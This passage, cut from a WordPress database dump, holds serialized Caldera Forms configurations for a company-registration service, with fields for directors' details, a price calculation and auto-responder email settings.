Type\";s:4:\"slug\";s:8:\"option_2\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:7:\"default\";s:0:\"\";s:6:\"option\";a:2:{s:10:\"opt1533135\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:3:\"Big\";}s:10:\"opt1786217\";a:2:{s:5:\"value\";s:0:\"\";s:5:\"label\";s:5:\"Small\";}}}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_8997460\";a:7:{s:2:\"ID\";s:11:\"fld_8997460\";s:4:\"type\";s:11:\"calculation\";s:5:\"label\";s:5:\"Total\";s:4:\"slug\";s:5:\"total\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:10:{s:12:\"custom_class\";s:0:\"\";s:7:\"element\";s:2:\"h3\";s:7:\"classes\";s:10:\"total-line\";s:6:\"before\";s:6:\"Total:\";s:5:\"after\";s:0:\"\";s:5:\"fixed\";i:1;s:18:\"thousand_separator\";s:1:\",\";s:8:\"formular\";s:53:\" ( fld_5987102+fld_4338248+fld_6796077+fld_1316929 ) \";s:6:\"config\";a:1:{s:5:\"group\";a:1:{i:0;a:1:{s:5:\"lines\";a:4:{i:0;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_5987102\";}i:1;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_4338248\";}i:2;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_6796077\";}i:3;a:2:{s:8:\"operator\";s:1:\"+\";s:5:\"field\";s:11:\"fld_1316929\";}}}}}s:14:\"manual_formula\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_1338703\";a:7:{s:2:\"ID\";s:11:\"fld_1338703\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:3:\"Pay\";s:4:\"slug\";s:3:\"pay\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:3:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:6:\"submit\";s:5:\"class\";s:15:\"btn btn-default\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fld_6796077\";a:7:{s:2:\"ID\";s:11:\"fld_6796077\";s:4:\"type\";s:6:\"hidden\";s:5:\"label\";s:9:\"Two Small\";s:4:\"slug\";s:9:\"two_small\";s:7:\"caption\";s:0:\"\";s:6:\"config\";a:2:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";i:1;}s:10:\"conditions\";a:2:{s:4:\"type\";s:4:\"hide\";s:5:\"group\";a:1:{s:13:\"rw74415141932\";a:1:{s:12:\"cl7168988428\";a:3:{s:5:\"field\";s:11:\"fld_5161425\";s:7:\"compare\";s:5:\"isnot\";s:5:\"value\";s:10:\"opt1786217\";}}}}}}s:10:\"page_names\";a:1:{i:0;s:6:\"Page 1\";}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:1:{s:9:\"on_insert\";i:1;}}','no'),(2874,'CF56f703597f336','a:20:{s:13:\"_last_updated\";s:31:\"Sat, 26 Mar 2016 23:28:46 +0000\";s:2:\"ID\";s:15:\"CF56f703597f336\";s:10:\"cf_version\";s:7:\"1.3.3.1\";s:4:\"name\";s:21:\"Test form no template\";s:11:\"description\";s:0:\"\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:7:\"success\";s:48:\"Form has been successfully submitted. Thank you.\";s:12:\"avatar_field\";N;s:9:\"form_ajax\";i:1;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:30:{s:11:\"fld_8206916\";s:3:\"1:1\";s:11:\"fld_1571458\";s:3:\"1:1\";s:11:\"fld_6562030\";s:3:\"1:1\";s:11:\"fld_2828361\";s:3:\"1:1\";s:11:\"fld_8860272\";s:3:\"1:1\";s:11:\"fld_1282952\";s:3:\"1:1\";s:11:\"fld_7471073\";s:3:\"1:1\";s:11:\"fld_9752837\";s:3:\"1:1\";s:11:\"fld_4045814\";s:3:\"2:1\";s:11:\"fld_3416133\";s:3:\"2:1\";s:11:\"fld_3880152\";s:3:\"2:1\";s:10:\"fld_132545\";s:3:\"2:1\";s:11:\"fld_8674929\";s:3:\"2:1\";s:11:\"fld_9364351\";s:3:\"2:1\";s:10:\"fld_522190\";s:3:\"3:1\";s:11:\"fld_9551334\";s:3:\"4:1\";s:11:\"fld_1545256\";s:3:\"4:1\";s:11:\"fld_8308585\";s:3:\"4:1\";s:11:\"fld_5540196\";s:3:\"4:1\";s:11:\"fld_4892098\";s:3:\"4:1\";s:11:\"fld_1866212\";s:3:\"5:1\";s:11:\"fld_6812809\";s:3:\"5:1\";s:11:\"fld_5671086\";s:3:\"5:1\";s:11:\"fld_7897870\";s:3:\"5:1\";s:10:\"fld_804187\";s:3:\"5:1\";s:11:\"fld_4785974\";s:3:\"6:1\";s:11:\"fld_2503013\";s:3:\"6:1\";s:11:\"fld_6024828\";s:3:\"6:1\";s:11:\"fld_8466692\";s:3:\"6:1\";s:11:\"fld_9847573\";s:3:\"6:1\";}s:9:\"structure\";s:17:\"12|12|12|12|12#12\";}s:6:\"fields\";a:30:{s:11:\"fld_8206916\";a:8:{s:2:\"ID\";s:11:\"fld_8206916\";s:4:\"type\";s:11:\"date_picker\";s:5:\"label\";s:18:\"Insert todays date\";s:4:\"slug\";s:18:\"insert_todays_date\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:8:{s:12:\"custom_class\";s:0:\"\";s:7:\"default\";s:0:\"\";s:6:\"format\";s:10:\"yyyy-mm-dd\";s:9:\"autoclose\";i:1;s:10:\"start_view\";s:5:\"month\";s:10:\"start_date\";s:0:\"\";s:8:\"end_date\";s:0:\"\";s:8:\"language\";s:5:\"en-GB\";}}s:11:\"fld_1571458\";a:8:{s:2:\"ID\";s:11:\"fld_1571458\";s:4:\"type\";s:13:\"toggle_switch\";s:5:\"label\";s:19:\"Number of directors\";s:4:\"slug\";s:19:\"number_of_directors\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:13:{s:12:\"custom_class\";s:0:\"\";s:11:\"orientation\";s:10:\"horizontal\";s:14:\"selected_class\";s:11:\"btn-success\";s:13:\"default_class\";s:11:\"btn-default\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:4:\"name\";s:12:\"orderby_post\";s:4:\"name\";s:5:\"order\";s:3:\"ASC\";s:7:\"default\";s:10:\"opt1352113\";s:6:\"option\";a:5:{s:10:\"opt1352113\";a:2:{s:5:\"value\";s:3:\"One\";s:5:\"label\";s:3:\"One\";}s:10:\"opt1587014\";a:2:{s:5:\"value\";s:3:\"Two\";s:5:\"label\";s:3:\"Two\";}s:10:\"opt1232673\";a:2:{s:5:\"value\";s:5:\"Three\";s:5:\"label\";s:5:\"Three\";}s:10:\"opt1311544\";a:2:{s:5:\"value\";s:4:\"Four\";s:5:\"label\";s:4:\"Four\";}s:10:\"opt1371778\";a:2:{s:5:\"value\";s:11:\"More than 4\";s:5:\"label\";s:11:\"More than 4\";}}}}s:11:\"fld_6562030\";a:8:{s:2:\"ID\";s:11:\"fld_6562030\";s:4:\"type\";s:9:\"paragraph\";s:5:\"label\";s:21:\"Proposed Company Name\";s:4:\"slug\";s:21:\"proposed_company_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:61:\"Provide 3-4 names of different variations, each on a new line\";s:6:\"config\";a:4:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:0:\"\";s:4:\"rows\";i:4;s:7:\"default\";s:0:\"\";}}s:11:\"fld_2828361\";a:7:{s:2:\"ID\";s:11:\"fld_2828361\";s:4:\"type\";s:13:\"toggle_switch\";s:5:\"label\";s:31:\"Do you have a business address?\";s:4:\"slug\";s:30:\"do_you_have_a_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:134:\"If not, the home address of the 1st Director will used as the business address. This can be changed once your business has an address.\";s:6:\"config\";a:13:{s:12:\"custom_class\";s:0:\"\";s:11:\"orientation\";s:10:\"horizontal\";s:14:\"selected_class\";s:11:\"btn-success\";s:13:\"default_class\";s:11:\"btn-default\";s:9:\"auto_type\";s:0:\"\";s:8:\"taxonomy\";s:8:\"category\";s:9:\"post_type\";s:4:\"post\";s:11:\"value_field\";s:4:\"name\";s:11:\"orderby_tax\";s:4:\"name\";s:12:\"orderby_post\";s:4:\"name\";s:5:\"order\";s:3:\"ASC\";s:7:\"default\";s:10:\"opt1826204\";s:6:\"option\";a:2:{s:10:\"opt1826204\";a:2:{s:5:\"value\";s:3:\"Yes\";s:5:\"label\";s:3:\"Yes\";}s:10:\"opt1447651\";a:2:{s:5:\"value\";s:2:\"No\";s:5:\"label\";s:2:\"No\";}}}}s:11:\"fld_8860272\";a:8:{s:2:\"ID\";s:11:\"fld_8860272\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:31:\"Physical Address of the Company\";s:4:\"slug\";s:31:\"physical_address_of_the_company\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:8:\"required\";i:1;s:7:\"caption\";s:75:\"If premises are currently not available the 1st Director\'s home can be used\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_1282952\";a:7:{s:2:\"ID\";s:11:\"fld_1282952\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:18:\"Suburb of business\";s:4:\"slug\";s:18:\"suburb_of_business\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_7471073\";a:7:{s:2:\"ID\";s:11:\"fld_7471073\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:28:\"Province of business address\";s:4:\"slug\";s:28:\"province_of_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9752837\";a:7:{s:2:\"ID\";s:11:\"fld_9752837\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:31:\"Postal Code of business address\";s:4:\"slug\";s:31:\"postal_code_of_business_address\";s:10:\"conditions\";a:1:{s:4:\"type\";s:20:\"con_5560882522748389\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4045814\";a:8:{s:2:\"ID\";s:11:\"fld_4045814\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:40:\"Incorporator or 1st Director\'s Full Name\";s:4:\"slug\";s:39:\"incorporator_or_1st_directors_full_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:67:\"The incorporator and the 1st Director are generally the same person\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:22:\"NB: Full name required\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_3416133\";a:8:{s:2:\"ID\";s:11:\"fld_3416133\";s:4:\"type\";s:5:\"phone\";s:5:\"label\";s:37:\"Cell Phone Number of the 1st Director\";s:4:\"slug\";s:37:\"cell_phone_number_of_the_1st_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:12:\"099 999 9999\";s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"local\";s:6:\"custom\";s:13:\"(999)999-9999\";}}s:11:\"fld_3880152\";a:8:{s:2:\"ID\";s:11:\"fld_3880152\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:37:\"Physical Home Address of 1st Director\";s:4:\"slug\";s:37:\"physical_home_address_of_1st_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:10:\"fld_132545\";a:8:{s:2:\"ID\";s:10:\"fld_132545\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:6:\"Suburb\";s:4:\"slug\";s:6:\"suburb\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_8674929\";a:8:{s:2:\"ID\";s:11:\"fld_8674929\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:8:\"Province\";s:4:\"slug\";s:8:\"province\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9364351\";a:8:{s:2:\"ID\";s:11:\"fld_9364351\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:11:\"Postal Code\";s:4:\"slug\";s:11:\"postal_code\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4785974\";a:8:{s:2:\"ID\";s:11:\"fld_4785974\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:24:\"2nd director\'s Full Name\";s:4:\"slug\";s:18:\"2nd_directors_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:22:\"NB: Full Name required\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_2503013\";a:8:{s:2:\"ID\";s:11:\"fld_2503013\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:34:\"Physical Home Address 2nd Director\";s:4:\"slug\";s:34:\"physical_home_address_2nd_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_6024828\";a:8:{s:2:\"ID\";s:11:\"fld_6024828\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"Suburb 2nd\";s:4:\"slug\";s:11:\"suburb__2nd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_8466692\";a:8:{s:2:\"ID\";s:11:\"fld_8466692\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:12:\"Province 2nd\";s:4:\"slug\";s:12:\"province_2nd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9847573\";a:8:{s:2:\"ID\";s:11:\"fld_9847573\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:15:\"Postal Code 2nd\";s:4:\"slug\";s:15:\"postal_code_2nd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_9551334\";a:8:{s:2:\"ID\";s:11:\"fld_9551334\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:24:\"3rd Director\'s Full Name\";s:4:\"slug\";s:18:\"3rd_directors_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:22:\"NB: Full Name required\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_1545256\";a:8:{s:2:\"ID\";s:11:\"fld_1545256\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:32:\"Physical Address of 3rd Director\";s:4:\"slug\";s:32:\"physical_address_of_3rd_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_8308585\";a:8:{s:2:\"ID\";s:11:\"fld_8308585\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"Suburb 3rd\";s:4:\"slug\";s:10:\"suburb_3rd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_5540196\";a:7:{s:2:\"ID\";s:11:\"fld_5540196\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:12:\"Province 3rd\";s:4:\"slug\";s:12:\"province_3rd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_4892098\";a:8:{s:2:\"ID\";s:11:\"fld_4892098\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:15:\"Postal Code 3rd\";s:4:\"slug\";s:15:\"postal_code_3rd\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:6:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:6:\"masked\";i:1;s:4:\"mask\";i:9999;s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_1866212\";a:8:{s:2:\"ID\";s:11:\"fld_1866212\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:24:\"4th Director\'s Full Name\";s:4:\"slug\";s:23:\"4th_directors_full_name\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:23:\"NB: Fulll Name required\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_6812809\";a:8:{s:2:\"ID\";s:11:\"fld_6812809\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:37:\"Physical Home Address of 4th Director\";s:4:\"slug\";s:37:\"physical_home_address_of_4th_director\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:14:\"Street Address\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_5671086\";a:8:{s:2:\"ID\";s:11:\"fld_5671086\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:10:\"Suburb 4th\";s:4:\"slug\";s:10:\"suburb_4th\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:6:\"Suburb\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:11:\"fld_7897870\";a:8:{s:2:\"ID\";s:11:\"fld_7897870\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:12:\"Province 4th\";s:4:\"slug\";s:12:\"province_4th\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:8:\"Province\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:10:\"fld_804187\";a:8:{s:2:\"ID\";s:10:\"fld_804187\";s:4:\"type\";s:4:\"text\";s:5:\"label\";s:15:\"Postal Code 4th\";s:4:\"slug\";s:15:\"postal_code_4th\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:8:\"required\";i:1;s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:11:\"placeholder\";s:11:\"Postal Code\";s:7:\"default\";s:0:\"\";s:4:\"mask\";s:0:\"\";s:13:\"type_override\";s:4:\"text\";}}s:10:\"fld_522190\";a:7:{s:2:\"ID\";s:10:\"fld_522190\";s:4:\"type\";s:6:\"button\";s:5:\"label\";s:9:\"Next Page\";s:4:\"slug\";s:6:\"step_2\";s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}s:7:\"caption\";s:0:\"\";s:6:\"config\";a:5:{s:12:\"custom_class\";s:0:\"\";s:4:\"type\";s:4:\"next\";s:5:\"class\";s:15:\"btn btn-default\";s:11:\"label_space\";i:1;s:6:\"target\";s:0:\"\";}}}s:10:\"page_names\";a:2:{i:0;s:6:\"Page 1\";i:1;s:6:\"Page 2\";}s:18:\"conditional_groups\";a:1:{s:10:\"conditions\";a:1:{s:20:\"con_5560882522748389\";a:5:{s:2:\"id\";s:20:\"con_5560882522748389\";s:4:\"name\";s:16:\"Business Address\";s:4:\"type\";s:4:\"show\";s:6:\"fields\";a:1:{s:18:\"cl7322955112456827\";s:11:\"fld_2828361\";}s:5:\"group\";a:1:{s:17:\"rw708466152844733\";a:1:{s:18:\"cl7322955112456827\";a:4:{s:6:\"parent\";s:17:\"rw708466152844733\";s:5:\"field\";s:11:\"fld_2828361\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:10:\"opt1826204\";}}}}}}s:10:\"processors\";a:2:{s:11:\"fp_58905420\";a:5:{s:2:\"ID\";s:11:\"fp_58905420\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:17:\"increment_capture\";s:6:\"config\";a:2:{s:5:\"start\";i:10;s:5:\"field\";s:0:\"\";}s:10:\"conditions\";a:1:{s:4:\"type\";s:0:\"\";}}s:11:\"fp_31133660\";a:5:{s:2:\"ID\";s:11:\"fp_31133660\";s:8:\"runtimes\";a:1:{s:6:\"insert\";i:1;}s:4:\"type\";s:14:\"auto_responder\";s:6:\"config\";a:6:{s:11:\"sender_name\";s:6:\"Zainub\";s:12:\"sender_email\";s:31:\"info@companyregistration.online\";s:7:\"subject\";s:31:\"Company registration submission\";s:14:\"recipient_name\";s:17:\"{user:first_name}\";s:15:\"recipient_email\";s:17:\"{user:user_email}\";s:7:\"message\";s:441:\"Hi %recipient_name%.\nThanks for your submission of information required to register the company.\n\nPlease note that your company name has to be available in order for the registration to proceed.  If your submitted name is not approved we will contact you for other possible names.\nIf the name/s provided is successful the registration will continue.\nWe\'ll then get back to you once the company is registered.\n\nwww.companyregistration.online\n\";}s:10:\"conditions\";a:2:{s:4:\"type\";s:3:\"use\";s:5:\"group\";a:1:{s:13:\"rw42556336953\";a:1:{s:13:\"cl10722462566\";a:3:{s:5:\"field\";s:0:\"\";s:7:\"compare\";s:2:\"is\";s:5:\"value\";s:0:\"\";}}}}}}s:8:\"settings\";a:1:{s:10:\"responsive\";a:1:{s:11:\"break_point\";s:2:\"sm\";}}s:6:\"mailer\";a:9:{s:9:\"on_insert\";i:1;s:11:\"sender_name\";s:26:\"Caldera Forms Notification\";s:12:\"sender_email\";s:19:\"imraanmaw@gmail.com\";s:8:\"reply_to\";s:0:\"\";s:10:\"email_type\";s:4:\"html\";s:10:\"recipients\";s:0:\"\";s:6:\"bcc_to\";s:0:\"\";s:13:\"email_subject\";s:21:\"Test form no template\";s:13:\"email_message\";s:9:\"{summary}\";}}','no'),(2912,'CF56f9267c4a9bd','a:21:{s:13:\"_last_updated\";s:31:\"Sun, 18 Jun 2017 06:29:09 +0000\";s:2:\"ID\";s:15:\"CF56f9267c4a9bd\";s:10:\"cf_version\";s:5:\"1.5.1\";s:4:\"name\";s:25:\"Company Registration Form\";s:10:\"scroll_top\";i:0;s:11:\"description\";s:94:\"																				This form is used for all private company registrations.																		\";s:7:\"success\";s:136:\"Form has been successfully submitted. \nYou will receive a confirmation of the name approved wthin 24 hours.\nThank you.																		\";s:10:\"db_support\";i:1;s:6:\"pinned\";i:0;s:9:\"hide_form\";i:1;s:11:\"check_honey\";i:1;s:12:\"avatar_field\";N;s:15:\"custom_callback\";s:0:\"\";s:11:\"layout_grid\";a:2:{s:6:\"fields\";a:49:{s:11:\"fld_8851747\";s:3:\"1:1\";s:11:\"fld_6562030\";s:3:\"2:1\";s:11:\"fld_9988349\";s:3:\"3:1\";s:11:\"fld_2828361\";s:3:\"3:2\";s:10:\"fld_844275\";s:3:\"4:1\";s:11:\"fld_8860272\";s:3:\"5:1\";s:11:\"fld_7471073\";s:3:\"5:1\";s:11:\"fld_1282952\";s:3:\"5:2\";s:11:\"fld_9752837\";s:3:\"5:2\";s:11:\"fld_4904638\";s:3:\"6:1\";s:10:\"fld_331127\";s:3:\"7:1\";s:11:\"fld_4045814\";s:3:\"8:1\";s:11:\"fld_1029156\";s:3:\"8:2\";s:11:\"fld_3880152\";s:3:\"9:1\";s:11:\"fld_8674929\";s:3:\"9:1\";s:10:\"fld_132545\";s:3:\"9:2\";s:11:\"fld_9364351\";s:3:\"9:2\";s:11:\"fld_4038678\";s:4:\"10:1\";s:11:\"fld_2139079\";s:4:\"11:1\";s:11:\"fld_8766963\";s:4:\"12:1\";s:11:\"fld_1344763\";s:4:\"12:1\";s:11:\"fld_1898978\";s:4:\"12:2\";s:10:\"fld_104167\";s:4:\"13:1\";s:11:\"fld_6931703\";s:4:\"13:1\";s:11:\"fld_4026549\";s:4:\"13:2\";s:11:\"fld_2391905\";s:4:\"13:2\";s:11:\"fld_5755232\";s:4:\"14:1\";s:11:\"fld_8573429\";s:4:\"15:1\";s:11:\"fld_8062310\";s:4:\"16:1\";s:11:\"fld_8912745\";s:4:\"16:1\";s:11:\"f